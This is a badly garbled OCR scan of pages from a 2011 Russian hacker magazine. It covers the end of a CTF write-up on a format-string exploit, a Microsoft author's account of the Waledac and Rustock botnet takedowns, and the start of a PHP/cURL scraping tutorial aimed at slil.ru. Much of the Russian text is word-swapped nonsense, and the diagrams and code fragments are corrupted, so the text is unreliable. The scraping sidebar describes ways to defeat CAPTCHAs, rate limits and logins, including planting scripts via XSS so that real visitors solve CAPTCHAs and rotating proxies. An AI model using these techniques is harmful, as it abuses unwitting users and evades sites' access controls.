являться <<xevgdirkhe»J, рядом усnешности символ сбрасывается равно используется

fputs . Если ни та , ни дру гая проверки неграмотный прошли, сцепление

прочертить неделю во готовно от ти для кибервойне . Впрочем , пользу кого того что­

обрывается. Собственно, нам нужно было пробиться в частности первую

бы поучаствовать на

пров ерку равно оборона экс плуатировать уязвимую форматную строку.

CTF, за тридевять земель скакать отнюдь не надо: на Рос вместе с ии опять же про­

водятся игры, не без; каждым годом набирающие на се в большинстве случаев да пуще
участнико в-

RuCTF, <<Сиб ъ Цтфъ >>, Leet Маге CTF, CITCTF да многие

другие. Тем, кто именно хо четное число испробовать домашние силы на навыке боевого
ха кинга на побег ловия х ограничен н ого времени равным образом от получай , нужно поскорее

собира ть команду равным образом расписываться получи ближайших со ревновани­

ях! Студентам, подумывающим об работе на сфере информационной
безопасности, достаточно обладать на виду, аюшки? многие ИБ-компании подо ­
бирают сотрудников на мичиган неуклонно для подобны х контестах. А такую

Ход решения: В так срок на правах одна доза команды в ночное время пыхтела

надо hiveг" ом, вторая пакет исследовала дампы трафика да искала
успешные атаки держи наши сервисы. Ребята поработали беда хорошо,

объединив уж имеющиеся зна ния по отношению сервисе, со <<успе шными » атаками,
проведенными нашими конкурентами бери получи с, равно получили потребный
эксплоит. <<Ус пешными » на кавычках, вследствие этого в чем дело? конкуренты до этого времени в одинаковой мере неграмотный
получили наши х флагов- сработала наша план защиты. Стратегия

около получай з ванием << атакуй меня, с намерением моя персона атаковал тебя » .

случай воспрещено у п уска ть . :Х:

ХАКЕР

00/153/2011

057

~акз
Ботнеты

на а полуют

В последнее срок об ботнетах на рунете го­

ОПЫТ КРУПНЫХ

ворят ужас много. В основном сие связано от

КОМПАНИЙ БОРЬБЫ С

ООоS-атаками в известные равно посещаемые
ресурсы. Однако первые прототипы современ­

ных ботнетов были обнаружены до настоящий поры на

КИБЕРПРЕСТУПНОСТЬЮ

0999 году.

ЧТО ТАКОЕ БОТНЕТ?
Ботнетпредставляетсобойсовокупностьсистем,зараженных
вредоносным ко д ом да у правляемы х централизованно . Причем устро­
ен спирт таким образом, что-нибудь уничтоже ние alias разъединение полно

большого количества узлов никак не требуется возыметь в его работоспособ­
ность на целом. Ботнеты могут употребляться для того та ких цел ей, по образу

""
"1

рассылание спама, фишинг,

,, 0

DDoS, атаки бери некоторые люди системы, инвазия

н овых ПК равным образом овидиевы превращения их на узлы ботнета. Стоит отметить, аюшки? на

"1

"1

0

этот миг промышленность киберпреступности порядком си льно

0

сегментирована в области специализации равно направленности пре сту пл е ний .
Это означает, аюшки? любой занимается своим делом. В результате

0
0

получается, почто созда т е ль Ботнета прода е т резервы сиречь служба

" ....

Ботнета другим злоумы шл ен никам , со пециализир ую щимся н а т ех либо

иных видах преступлений [типовую бизнес-структуру твоя милость можешь

0

0

соответственно смо тр еть в иллюстрации). Стоит отметить, почто интерфейс у прав­

"

"

Фt~wинг

.

ления ботнетом д оволь так насчет ст. С ним можетсправиться человек,
обла дающий пусть даже аспидски низкой квалификацией. В соответствии не без;

-

облачными веяниями, во посл е днее миг появила сьуслуга Malwaгe

as а Seгvice. Е сли неизвестно кто далеко не может разработать равным образом пропагандировать особый

Вз.nо да щик
AT<IIC.ИMa
сераеры

зловре дный код, всякий раз найдет ся сильнее поднаторевший провайд ер та ких
услуг, годный не без; д елать сие из-за определенные д е ньги. Впрочем,

разбудить ботнет сей дня равным образом никак не Всемогущий уведомление какая сложная задача. На
Поnытки заражения новых комnьютеров fмодов\

рынке вкушать избыток готовых наборовдля изготовления ботне-

та, таки х в духе Zbot [Zeus), Spyeye, Maгiposa, Black Епегg у, ButteгFiy,
Схема использования ботнета

058

Reptile. Это означает, что-то современ ны е владельцы ботнетов могут

ХАКЕР

00 /153/2011

пусть даже отнюдь не иметь отличительной особенностью какими-либо особыми технологическими навы­

крупнейших ботнетов. Звучитгром ко?

ками . Впрочем, буде басить относительно крупных ботнетах, так их создатели­

01\/l•..,.•тn.""~"""" такие ботнеты, как:

ii80%мировогоспама.

это, безусловно, способные, талантливые люди, сражаться из которыми
изрядно сложно. В рамках сего материала мы хотел бы раструбить по части

служил инструментом интересах финансовых пре­

принесшихболее$100млнубытков.

практиках, которые используются большими компаниями к борьбы
вместе с киберпреступностью и, на частности, ботнетами. Речь, во частности,

пойдет об активности компании Microsoft, во которой автор этих строк м работаю.

w,.,.,.n,.r.боты которого отправляли

0,5 млрд спам-сообщений

жедневно. В дело е его исследования было найдено пол­
миллиона nа ролей с почтовых ящиков пользователей равно FТР ­

MICROSOFTVS. БОТНЕТ
Возможно, сие равным образом заставит кого-то улыбнуться, так на

серверов.

Microsoft на по­

ИЕПРАКТИКИ

следние нескольколетнаблюдается серьезная разработка в соответствии с повышению
безопасности продуктов равно сервисов . Появились равно стали прилагаться

Длятого ради nонять типовые способы уничтожения ботнета, следует

методологии разработки безопасного заключение SDL, сколько ключевым образом

разобраться от его архитектурой да слабыми местами. Чаще всегодля

повлиялонаколичествонайденныхзапоследнеевремяуязвимостей

управленияботнетомиспользуетсяодинилинесколькокомандных

[особенно тех, которые дозволительно эксплуатировать). Но речьсегодня пой­

[часто центральных) серверов , называемых Command & Control, иначе

дет невыгодный касательно превентивных мерах, которые могут устранить будущие

С&С.Онивзаимодействуютсконечнымиузламиботнетаnоразным

угрозы, а по отношению борьбе не без; задача ми, которые актуальны сегодня. Большое

nротоколам.Наиболеечастовкачествеnротоколауnравленияис ­

часть зараженных машин -как разтакая проблема.

nользуетсяiRС.Впрочем,впоследнеевремярезкоувеличилосьпри­

Внутри компании был создан весь цепь подразделений в области борьбе вместе с
киберпреступлениями. Последние носят небо и земля имена- Digital

менение Р2Р-протоколов как бы больше устойчивой, даже если да технологич ески

Crime
Unit, Microsoft Security Response Center, Microsoft Malware Protection
Center,Trustworth Computing, -но задачи каждоготак другими словами по-иному

сложной альтернативы. Интересной экзотикой на последнее вр емя

пересекаютсясnроблемойкиберnрестуnности.Вместесправоохрани­

Facebook. Так не в таком случае — не то иначе, на борьбы от ботнетом дозволено затеять

тельными органами да исследовательскими организациями

порядком конкретных дей вместе с твий :

Microsoft

сталоиспользованиедляуправленияботнетафайлообменныхсетей
равным образом поставка управляющих команд во теле фотографий, публикуемы х держи

С&С- из ерв е р

С&С-сер на ер

С п аиеры

Рассыnка
сnама

Судебное уступка nо ­
Заражение
новых машин

зволило сдержать

действиедоме нов , ис­

nользуемых ботнетом

Закрытие ботнетов нелюбезно сократило доля мирового спама

ХАКЕР

00 / 053/2011

059

хакинг

Захватить сиречь уволить изо строя С& С-узлы .

DDoS сверху С&С-узлы.

НЕ ТАКИЕ, КАК ВСЕ

Жалобы провайдеру, идеже хостятся С&С-узлы.
Захват DNS-имен, используемых С&С.
БлокированиеiРадресов.

Арествладельцаботнета.

Опрометчиво считать, почто Ботнеты состояттолько с Windows -машин .

Естьботнеты равно для Linux/Unix-PsybOt, Chuck Noггis, насчитывающие сот­

Судебный иск.

нитысяч устройств. В основномтакие Ботнеты создаются изо домашних
К сожалению, далеко не безвыездно изо сих способов эффективны, а иные равным образом
положительно незаконны . Междутем другие изо них нам успешно посчастливилось

маршрутизаторов, коммутаторов да NAS нижнего ценового диапазона.
Уничтожитьтакой ботнеткрайне трудно, таккакдомашний абонент

применить. Так, Ботнеты Rustock да Coгeflood были уничтожены доволь­

во большинстве случаев невыгодный обладаетзнаниями во Linux да навыками обнов­

только тривиально. Это посчастливилось свершить со помощю захвата С& С-серверов

ления прошивки устройства. Производитель устройства заинтересован на

правоохранительными органами по мнению решению суда. Затем правитель­

быстром устареванииустройства равным образом то и дело отнюдь не лишь малограмотный намеренустранять

ство СШАдало правоохранительным органам доверенность со через

недостатки,ноинеимеетмеханизмовцентрализованногообновления

командного интерфейса ботнет а отрядить командуудаления заключение

своих продуктов. Поданным исследования от2009 года, на интернете на

малвари вместе с зараженных машин. Работа до закрытию другого ботнета­

кому только лишь не лень мгновение дозволено разыскать небольшую толику миллионовдомашнихустройств не без;

Wаlеdас-оказалась до этих пор больше интересной, да держи этом моменте ваш покорнейший слуга хотел

устаревшимиnрошивкамиипаролямипоумолчанию.

бы встать подробнее .

WALEDAC: УСТРОЙСТВО
Сложность борьбы вместе с

Waledac заключалась на децентрализованной схе­

~

ме работы ботнета. Для его работы было зарезервировано ни числа ни
было сразу у разных провайдеров хостинга. Кроме того , ради
управления ботнетом успешно использовался Р2Р-механизм. Если

рассмотреть нате схему ботнета , в таком случае одновременно бросается во шары числа вместе с лой­
ность управляющих серверов. В процессе заражения системы вместе с по­

мощью Waledac недобрый шифр определяет, какую место бросьте выпол­

cnм:co~t.

.. coce,ael,.

ш.а.о~~ ходо.ь:.Ш.о

CnмcoK .. COCiдeiJoo

O.c;.IO.O.O.d;JO.O.O.e; li
O.O.O.J:1Q.O.O.c;.10.0.0

t"l..lA..u,J!l.lA.x.d:

~1- 068.;t.a;J,2. 0bl.ll.b
~,2". 0il".. .... ,1,:l.lbl.!i.t
l 02. 061.s..&:191.1""--.llt
092".16&.&.t-xgl.161.1.f;

.h:IOO.OH;J,O.O.();joJ:OI
O.O.k;lO.OCk~JO!O.O.m
.IO.O.«U;J:O.O. O..o; .Ш.

O.O".p~O.O:OI IU}O.O.O.I

092: 0М...IIr; l!2. 061..-.t

; .IO.O..O"...t:JO.O. йt

l,l.J6a.amrJ92. f6LLA:
JЭ~ 068lJI..o~1.16Ь-o~

нять свежий узел. Он становится либо простым узлом, рассылающим
от шаг м, кабы находится вслед

Зараженныйуэел

...
~aledac (nоеторитеnьl

-

чуть-чуть 077 дом.енных имен. Это значит, что-то разбирать сервера нужно

0"9l. J68:.a-4, 0Эl .J61,a_r.
0911~;.192.168..a.l

NAT равным образом никак не принимает входящие соединения получай

00 й порт, либо узлом, что повторяет !ретранслирует! команды с
центра , -то убирать своего рода репитером. Репитеры используются к
управления ботнетом. Каждый репитер сверх того передачи у правляю­
щих команд узлам-спамерам поддерживаеттакже опись « соседей>>,

пребывающий с 000узлов, как и выполняющих амплуа ретранслятора,
ко которым спирт может прибиться согласно Р2Р протоколу. Со временем

какой угодно узел-повторитель регистрирует свое доменное прозвание во fast flux

DNS. Это делается пользу кого того, воеже наделить выполнимость задавать вопрос ко

Каждый репитер поддерживает перечень «соседей»

Сnмсок «сОСе,ааА,.

IOO:O.;,:IO.O.O.b; IO.Ol
0.~10. 0.0

d:I.O.O,O.r,JI

o.o.o.~to..o.o..,;1o.o. o

.h:IO.O.O.I:.IO.O.CNf:_lOt
О" O.II.;JO.O.O.I;lO.O.O."""
Cnмco lt .,COCeЩI.I"•

;IOO.G..n;JO.O.O.O".JOJ
ctO.r.JO.O.O.q.: 00.0.0..

0-"l.l&&Jr.~;Ul". IA.-..Ь.

;ro:o.o.s.:1o.o.a.r

0.91..168Jr.r..lt1.16&.л.d ,

Зараженный уэеn

~- ~~;Ul . IЫ.....I;

Waledac (nовторитель)

092". 06&ц:;l!l. ~
092.1А.ЦJ92

0:61.-.;.
...1,

0,2, 0 ~192 . 061

Главный С& С-сервер

Fast Flux
DNS-cepвep

0 0l. 061.1 ."".1"l. l~ n:.

Fast Flux

L!2. 06&JI.o;J,H6Lo..rr.
04}.1_161.x.-r.U1.16t.J...f:
091".1.........1,l. l&a...l

DNS-i:epeep

tt

Зараженный агрегат

Waledac (nовторитель)
.... Ко~мдw

" - -

-. в.._~•·
Промежуточный

/

/

nовтормте.nь

.

. . . Tpo~ф.м.naiJJOPimlll8il
. . . Fast Flux· DNS

регулятор

... Сn;r,м-~•к

ITSLI

Повторитель"
ЗараженныМ
установка

Waledat:

Уэеп-спамер

Многослойная архитектурауправлен равным образом моя персона Wa ledac

060

Сервер

Microscft

Подключение серверов Microsoft ко Waledac

ХАКЕР

00 / 053/2011

Как закрывают ботнеты

(J
Зараженный шарнир

Waledac tn что касается еторитеnь}

Сnмсок *
O.O.O..a;.lOtO.O.Ь;tD.D

l.<;:;lO.OJO.d~·10.0IO.e;1

Реrмстрацмя на

I :O.O.f;l.OJ0.:0&;10.0:0
.h;10,0:0.t; J.0.0.0.j;:t·o.

DNS

O.CJ~.10.0iCЦ"1DJO.Om"1

,;t0.0.0.n;1040.o;4.0.

O.O,p;i1011U1Jq;I0.0.01
.:10AD.t.::1D.D.O.t
.С О М D NS-cepвep

За р ажениый шарнир

Waledac

(n ов торител ь)

Регистрация здание е н н по отношению г об да мен равным образом

Ста ндартный n од х од ко у nр авлению б отнет что до м

себя узлам-спамерам, разве непосредственный ко ним репитер против всякого чаяния выйдет

проц е дуры ICANN я воепользавались проц е дурой TRO ltemporary

изо строя да достанет недоступен. Таким образом узлы ботнетавсегда

restraiпiпg огdег]- изумительный змож ностью пока ареопаг да дело приостанавливатьдей­

могут выискать стоит сверху очереди узел-ретранслятор да прикладывать через него

ст вие доменов для 08 дн ей . На этом этапе до этих пор одной сложностью было

коман ды равным образом обновления исполняемого заключение . Со временем роли узлов

то, ась? деление DNS -имен была зарегистрирована натерритарии Китая равно

могут меняться. Е вместе с ли система, используемая в духе повторитель , ко

Нидерландов . Поводом в целях судебного иска было нарушениеторговой

примеру, попадает на корпоративную подсак да лишается внутренние резервы

марки Microsoft равно Pfizer. Ботнет темпераментно рассылал переписка из уведом ­

полагать подключения бери 00-й порт, в таком случае симпатия механически полу­

лениями что касается выигрышевн есу ществ ую щей лотерее Microsoft равно рекламу

чает занятие не без; шаг мера. При этомпроанализировать топологию ботнета

подде льныхлекарств перед маркой Pfizer.

никак не приблизительно п роста, оттого в качестве кого сызнова одной вслед за дачей репитера является

Для того в надежде злоумышленники могли перебороть ся от Mi cro soft во

воздействие исследованиютопологии ботнета. Он служит

судилище е, еже ли у них появится а лани е вслед за изобличить домашние полномочия получи и распишись лодка н ет, н а

своеоб разным корысть си да отнюдь не позволяетузлам-спамерам смыслить что­

сайте было опубликовано исковое заявление. Также на националь­

либо об у правляющих узлах С&С.

ны х газетах сверху терри т ории из тран, откуда родом подозреваемые управляли

ботнетом, были опуб очертания относительно ваны у ведомления по части ваша сестра зо на е во суд. Как равным образом

WALEDAC: УНИЧТОЖЕНИЯ

предполагало со ь, последняя ганшпуг в колеснице безграмотный посм е л предстать на вывод равно изречь по части своих

Проанализировав архитектуру ботнета, автор сих строк проработали горизонтальная проекция к

власть х получи и распишись ботнет. Таким об с налета Mic ro soft выиграл вывод бери территории

атаки для ботнет со следую щими конкретными шагами :

США , Китая да Нид ерла нд ов. Подробнее насчёт юридическихтонкостях равно

0. Наруш ен ие р2р-механизма обмена управляющими командами.
0. Нарушение обмена DNS/НТТР-командами .
0. Нар у шение работы двух верхних вместе с лоев С&С-серверов .

сайта Microsoft I Ьit. l y/riDUDA ] .

перипетия х борьбы вслед за ботнет не запрещается боготворить во специальном разделе

В результате эт равным образом х юридическихдействий полномочия получи DNS п ереш ли
для Microsoft. На заданный м оме нт DNS-имена подключены ко серверам

Первым делом нужно было пресечь работу Р2Р-механизма . В

Micr osoft. В не без; л у ч ае, йес ли ко э тим се рверам подключается инфицированный

отношения из тем, что такое? связка нахождения ближайшего ретранслятора

узе л с ботнета, получи него подается килоом анда, прика зываю щая боту

среди кавасаки перевелся а ра ботала н естаб ильно , была возможна ситуация, зачем

бездействовать. К сожалению,

узлу приходилось рассортировать до самого 00 адресов, в хо дящихся на е г в рассуждении вместе с писке

вр е поклепный адрес бота Waledac, посему автор связываемся из провай­

Microsoft неграмотный имеет карт-бланш выключить

« сосе дей >>, в надежде выискать занимающийся окружный репитер . Благодаря

дер ами, при помощи котор ы х юзер подо клю чен ко Сети равным образом насчет сименс их

этому нам посчастливилось сотворить поддельные репитеры, ввести равно х во со­

помо чь пользов ате лю отделаться с вр е д оносно г относительно стих из п что до мощью

став ботнета равно пофигарить поднимать фальшивые обновления списка

сатана п латных утилит, таких что Microsoft Secur it y E sse пtia l равно Maliciou s

репитеров, тем самым нар ушив связность системы управления Р2Р.

Software Remo val To ol .

Этопозволилопередаватькомандыузлам-спамерамотспециально

соз данных командных серверов Mi crosoft.
В случае н ерабо тоспособности Р2Р-механизма узлы ботнет а

АКЛЮЧЕНИ
Мы надеемся та ки м образом объединение сте п е нн что касается очиститьинтернетот по­

начинают искатьдруг друга не без; через механизма fast flux DNS.

со ледни х остатков ботнет а Waldac. Чтобы з л оумышлен никам было

Поэтому надобно было поломать равным образом этотспособ управления, с целью

неповадно во дальнейш ем образовывать ботнеты,

з лоумышленник отнюдь не был способным создать вновь инспектирование по-над ботнетом. Это

честве со прав оохра нит ельн ыми органами продолжает расследо­

курьезный момент, потомучто на этом месте ты да я использовали правоведческий

вани е равно сбо р судоремонтный завод аза т е ль от тв . С этой ц е лью я пр едложи ли награду

механизм. Типичная церемония отзыва DNS имени вследствие ICANN от по­

во $250 000 тому, кто такой сообщи т сведения, из соответственно собс твующие аресту

мощью процедуры со страшным названием « Uпiform Domaiп-Name

пре не без; т у пной гр у ппы , стояв ш ей вслед Ru sto ck I Ьit. l y/oR7x88 ] . По на­

Micro so ft во сотрудни­

Dispute-Resolutioп Policy>> можетзанятьдовольно несть времени . Это

шему опы т у, таковой перед шаг может со работ ать. В заве ршение хоче тся

позволило бы з лоум ышл енникам успевать осознать, что-то равно х атакуют,

сказать, что-нибудь Microsoft да на дальнейш ем намерен боевито равняться

равным образом совершить планы до регистрации новых DNS-имен, нате которые

вместе с киберпреступлениями, пре из ледуя злоумышленников вс ем равно до­

позжеперевестиуправлениеботнетом . Поэтомувместостандартной

ступными ему способами. :Х:

ХАКЕ Р

0О /153/2011

061

qbz [caydlayandex. rul

blt.lv/qV15Z8мaнyaл соответственно настройкам

cURL.
blЦy/oMBm cWплаrин

ИНГ

LiveHПPHeadersдnя

Mozilla Firefox"a.

ДОБЫВАЕМ ЦЕННУЮ

ИНФОРМАЦИЮ С ЧУЖИХ САЙТОВ

Автоматический налог информа­

0

редположим,переднамистоитзадачапроанализировать

0

много страниц одного сайта равным образом сконцентрировать от них какую-то

ции со чужих сайтов на больших
объемах-задача простая толь­

На наwем дискеты
найдешь видео, под­
робноописывающее

ко получи первоначальный созерцание . Сегодня ваш покорный слуга

процесспарсии га

из криптам , кто будетходить в области от айту, разбирать контент равным образом вас ­

сервиса slil.ru.

поделюсь вместе с тобой конкретным

дирать оттедова нужные данные.

Однак касательно сверху дел е во сё никак не где-то nро вместе с в таком случае : любые сервисы отнюдь не заинтере из ова­

Такженадиск наш брат

опытом по мнению созданию грабберов

бережно выложили
по сию пору необходимые

с целью удаленных ресурсов для при­

скрипты да быть распоряжения .

САР Т СНА;

авторизацию lcookie, сессии !;
НТМL-код, какой

автор сих строк поnучаем со slil.ru

сертификаты;

Jа v аSсгiрt-защит у ;
ограничение соединений;

"- m- -

ге нерацию ключей доступа чер е з

flash;

другие, больше изощренные со пособы защиты .

< acr 0p~ c;~ ··~ ext /j avaacr1pt ">

" """ 0Jrt ld!>ld .

него воровали информацию , загружали сервераненужным трафиком
равно совсем игнорировали рекламу. Поэтому по сию пору кру пны е сервисы

mamba.гu равным образом slil.гu .

l l ~:.P" / "e "7 S!II 0 0/

ны во том, ради вместе с равным образом х со истемами работали боты . Никто невыгодный х оч ет, с тем у

активноборют от ясботами,испольэуяраз н ообразные технологии :

мере во всем известных сервисов

v• r

ко н кретную информацию : выворотить ссылки, телефоны, имена
равно в такой мере дал е е. Вроде в духе начинание беда простая равным образом решается несложным

0 e2~a 0211 /Ь.c.lnlarcl . " РО" 0

</ a e-r :~.pt >
<t.Ьla

Miq!"!t• "100"" w1clt!"l• "l00""

011- ~r:c;i">

ha1qht•"2S"Xtd></t4></~:r>

<tr

<tr><tl1 ha1Qht• "100" ali;n• "center•
<P>Cnt. o:м6o асен,

Впрочем , во от е используемые те х нологии- сие малограмотный полное резолюция

valЦ~:. • "alcSdla">

кт в рассуждении nots::o "aaт paJaи8&":t. расурс . </р>

проблемы, а всеголишь осложнение процедуры: пройти присутствие граббинге

</td></CI">
<tr><td v&11qD• "ru.dCI.la">

дозволено вполне во сё.

aliqll.• "" cantar">
j iJ9" nD 0P 0 "nЬap s "сЬарs 0 !>4!1 <Ь:к:><Ь::: >

Ь•сЬа rcl .
</р>

&11qn•"oencax">

~ака<tка

<•

taA.IIa

м а .. наrс~r

<t81""11 00

саку11J1,

кт.и

aocn0JIIIa)"Й78Cio

<8:1=&11

ПРАКТИКА

:Ld.• ~link_pllc:e"></.tpan><l:lr>

hж•t • "/pa;•IU.u.t•7id. "" 0l4~!jj8l">noaaJ1:oa•т•c:• 011 фаА/1 .</а>

Как г оворится, паче единственный присест увидеть, нежели сто единожды услы ш ать. П оэтому
подле от тупим ко практич еской ча со ти , на которой наш брат н а п да ш ем безыскуственный пар­

v•r H nk- " / S81.5e jje l/ 011:t6d.5 l d.. i •2b•i2*" t o r.,.rd . pn; • J
do.cшмtnt . g• t t:liC8 Dt !lyi cl(" l~ nll:_plac:e •

0 . ~::nerHIИI.•" < • h:•t•" " .. l ln k ... . "

o nc:l:l. c:k-"dl_ fl• O"> c:aФKQЙ</ a>";

сер для того удобного Файлаобменника slil . г u .
Выбор п ал получи и распишись него , этак вроде ни ко аки х особых защит во еб-сервер сего

l l t 0"1- 0U t ( t U:IC:t:I.011() (
0!(41 f l •• l)
cloc:шЙn t . l oc:atlon . l"::lt"• l l nkJ

),

ре не без; ур со а н е ставит, а своевольно дьявол охватывает числа интересной информации ,

ЫI О О) ;

экий по образу загруженные аккаунты, секретный софти кое-кто увлекательно ­

</ •c::l.pt >

со ти . Рассмотрим ан от тр у ментарий , каковой ты да я будем истощить через

</Р>

азы напи не без; ания бота да вплоть до первы х полученных результатов:
Браузер.

<tЖ>

РНР.

<tcl> ,nЬ•p J </td.>

<tcl wiclth• "i00">
</td.>
<td>,nbiP t </td>
</tr>

062

...

cURL.
Плагин Li vе НТТРН еаdегsдля

Mozil la F i гe fox .

ХАКЕР

00 / 053/2011

Парсингпо-крупному

Больше нам околесица далеко не потребуется, за исключением головы получи плечах да удоб­

ного тек со т ово го редактора. Для основания выкладывай определимся, аюшки? а да мы не без; тобой

r I! Vt_" 0111р lн·.нJ("f-.

GJLQj ~

ttaders Gmtrator Config AЬout

будем п арси ть . П арси ть будем номинация файла, его разм ер равно ссылку для того
скачива ния . Вся каста сведения содержится на НТМL-сорцах страницы

Accept: iniQt{png, ·r;Q-o.s

скачи вания загруженного файла.

АссерН~ : en"US,ei.;q-o.s
A~t-Enc.odino: gztp,deflatt
~t<har~t: IS0-88S9·1,utf-8;q.O. 0, •;q-o. 0

Теперь рассмотрим способы настил уче ния стих праздник самой не без; траницы .
Их и несколько:

0.

........... ,))!)

Стандартная функционирование file _ get_coпtents[). Требует включенн ую

...,.,.,"._...,.

с.,

Refe<"" ht1;>"1/www.i<q.<Om-.ЬO•fenldeot""t1p"/fwww . i<q.<Om/

РНР - директив у allow_ uгl_fopen . Включить ее не грех вследствие

. htaccess-фaйл настройки сервера Apache [php_flag allow_uгl_
fopen on). Здесьтакже нелишне у помян уть, в чем дело? во пятой версии
всеми любимого РНР отсюда следует возможным соз выпускать определенные

настройки с целью НТТР- ради проса . Это реализуется примернота ко :

Н1ТР/1 . х

000 ОК

O.,tt: Fn, Z2 )J 001121:56:00GМf
Content-Length: 05

no<ac:he
fxs*es: \Yed, 09 Apt 0000 01:43:00 GМТ

Pragrм:

last-мodifled:

Wed, 01 kn 0001 09:51:30 GМТ

eontont""""" ""-IФ
~<ontJol:

_$_~e"tt:Шg~=.. a.c.r;;J ~(."J:tj;j;p_:_~y_(" method"

=> "GET", "heade_r "=>
____::_u_ser_::Ageдt; [ЮЗЕРАГЕНТ)",[.Iш_,
" ·- - - - "Accept : text /x ml, application/x ml,application/
xhtml+xml;q=0. 0\ r \ n" .
"Accept-Language: en-us,en;q=0.5\ r \ n".
"Accept-Encoding: gzip,Q_eflat e\r \ n".
"Accept:_chars et;J$0-!182~bl, utf:.S; q=0. 0,:"; q=0. 0_":));__ _
$settings=str.eam_context_create($settings); _ __
$html=file_get_contents(" http://url.tld/" , NULL, $settings);

prtvatt, no-acht,

no~·~t<ocЖie, proxy<f~.11dote

Server: GFf/2.0

Плаrин LiveHПPHeaders

Идеальная вещьдля работы из удал е нны ми серверами. Это по образу
гельветический нождля соста вления запросов бери сервер. Всё продумано
д в рассуждении мелочей равно обернуто во инстинктивно понятн ую среду разработки. На

0. Со кеты [fsockopen[) да отдельные люди функции, которые автор сих строк ра ссма тривать
никак не будем).

курле пишущий сии строки да остановимся, круглым счетом вроде только лишь дьявол может дать нам

многопоточность работы равно треб уемую быстроту [в среднем
хорошо раза быстрее

0. cURL.

cURL во

file_get_contents).

КАК СЕРВИСЫ ЗАЩИЩАЮТСЯ ОТ ГРАББИНГА, И КАК ЭТО ОБХОДЯТ
САРТСНА

Авторизация

Сертификаты равным образом

Лимитсоединений

Существуют no крайней

Оч е нь почасту бываеттак, что-то

JаvаSсгiрt-эащиты

Для защиты с граббинга

меретрисnособа пользу кого

нео бходимаяи нформация

Ресурс, со которого твоя милость

грамотные админи­

обхода во всех отношениях надоевших картинок от

дост у nнатоль ко дляз аре ги стриро­

хочешь пускать кого в одной рубашке ан фу, может сидеть

стра торы ставя тограничения возьми

мутными цифрами /бук вами .

ванны х польэователейоnределен -

помощью SSL, равно на этом случае, если бы не­

ско ро вместе с тьзакачиваниястрани-

Скриnтнаосновенейросетии

н ого ресурса. Она можетнаходиться на

обхо димы й сертифи кату тебя есть, неграмотный

цы п ользо ват елем, а тоже для

други х алгоритмов. Эффектив­

какой-либозакрытой частисайтаили

составляетбольшоготруда порекомендовать

численность соединений равным образом частоту

а ст ь из пособ аможет интрузия а

а прятаться nодтак нате зываемым

скриnтис п ользов ать текущий сертиф равно кат.

активности. Понятно , зачем ни безраздельно

меняться, во случаекачественной

буча хата сверху форуме . Также вот многих

Для РНРя могуnосоветоватьзаме­

нормальныйпользовательнерабо­

капчи эффектив ностьавтома ти ­

случаяхдля регистрации тебе может

чательнуюбиблиотекусURL, которая

таетссайтомнесколькочасовпод­

ческогорасnознавания оnустится

nонадобить сяс nециальноеnригла­

подходяще р еа лиз грин т постоянно ради дачи , свя­

ряд,выкачивая5000страницвчас.

ниже5 %.

шени е -- да нв а йт через сейчас состоя вши хся

из-за нные вместе с сетевым взаимодействием.

По этом у, анализируя усилия

Сервисы ручного ра из nо зна ва-

чл енов сайта. Только nосле nро­

Что касается JаvаSсгiрt-за щит, в таком случае

клиентов, умные системы равным образом

ния ка nчей от удобным АРiдля

хож дения nроце сса реги стра ции для

они чаще всегоориентированы бери

могут выявлятьлевыхпользовате­

автоматической работы . Здесь

ресурсе твоя милость сможешьполучитьдостуn

зашифровка ис ходного заключение [читай

лей равным образом сужать их работу. В в таком случае

кресловина тин ки разгадывают реальные

ко н ужному разделу. Данная вслед за щита

статью << JavaScгipt : Игры во nрятки »

а минута администраторы отнюдь не могут

люд во спирт лайн-режим е, nо этом у

невыгодный nр е дставля етбольш ой невзгоды

с прошлого номера) либо в nров ерку

действоватьвлоб:ведьпододним

эффективностьсnособаочень

на обходе, скорее, н ем ного замедляет

сnециальныхjs-nеременных , которые

IР-адресом вnолне могут мотать срок

высокая : поперед

работу нашего бота, равно так на закраина света безграмотный

доказывают, зачем вместе с тр ани ц а загружена

не без; в один из дней усотни куверта .

минус--заисnользованиеэтих

век . Е сли ты да я хотим пров одить

р еальн ым спринклер ром, а безграмотный ботом.

сервисовнужноплатитьденьги.

множестводей ствий в нужном сайте

Обходятс моя персона сии методы элементарным

зао днуминутуполучить1000

00% . Единственный

CMS

Что но делать, если бы нам нужно

И сnо льзов ани е ХSS-уязвимостей

из-nод одного авторизован ног что касается а для ка­

анализом НТМL-кода стра ницы . Такой

стра книзу , а сервер безвыгодный реагируетуже

дляnодсовываниякаnчейреаль ­

у нта , так нам сле дуетсо ставитьо дин

разбирательство твоя милость несложно сможешь выnол -

nосле 00 -й страницы? Исnользо­

ным nользователям. При nомощи

доnолнительный заnрос ко серверу во

нитка вместе с nомощью инструмента О ре га

вать

ХSSнауязвимомсервисеможно

самом начале работы бота . Данный

DгagonF iyв <<О пере >> иначе говоря nлагинадля

случае процесс бота бросьте происхо­
дить далеко не из одного IР-адреса, а напри­

socks- равным образом

ргоху-сервера . В этом

разместитьспециальный ск рип~

просьба необ ходим на получения ав­

<< Ли сы» Li veH TTPH eadeгs. Обе сих

каковой будетблокировать

торизационны х кукисов. Чаще лишь

тул з ы nомогу ттебе nонять, какие но

мер, со

интерфейс да nредлагать nользо­

сие вот поэтому и есть сооkiе-заnиси, равным образом ни плошки

POST-, GET- да СООКIЕ-переменные

лоб широк ножив

вателю различать каnчу.Люди

больше . Посл е n олучения nеченек ото

твой браузер по мнению сы л аетудал ен н ому

заn ро сов, бери которые сервер безошибочно

сейчаснауровнерефлексагото­

сервера nосл е дую щие заn росы будут

р есурсу. Затем твоя милость сможешь врезать

принуждён ответить.

ваша сестра для экой ситуации равным образом из удоволь­

nрои схо дить этих исnользованием,

сии переменные на кодсвоего бота.

ствиемраспознаютподдельные

нежели ты да я равным образом обходимданную защиту.

000 IР - адресов. Тем самым,
000 возьми 00, автор nолучим 0000

картинки, безграмотный чуя подвоха.

ХАКЕР

00 / 053/ 0011

063

взламывание

$_curl=curl_init();
$head=array{_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __
__"_tlost: slil . ru", _ _ _ _ __
"User-Agent: (ЮЗЕРАГЕНТ] ",
"Accept: text/xml,application/xml,application/xhtml+xml;q=e.s·,
"Accept-Language: en-us,en;q=e.s·,
"Accept-Encoding: gzip, deflate",
"Accept-Charset : IS0-8859-1,utf-8;q=e.7,! ;q=
- e"_,."-7__,
"- " ~__:_кeep-Alive : Зее· ,_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __
"Connection: keep -alive" _ __
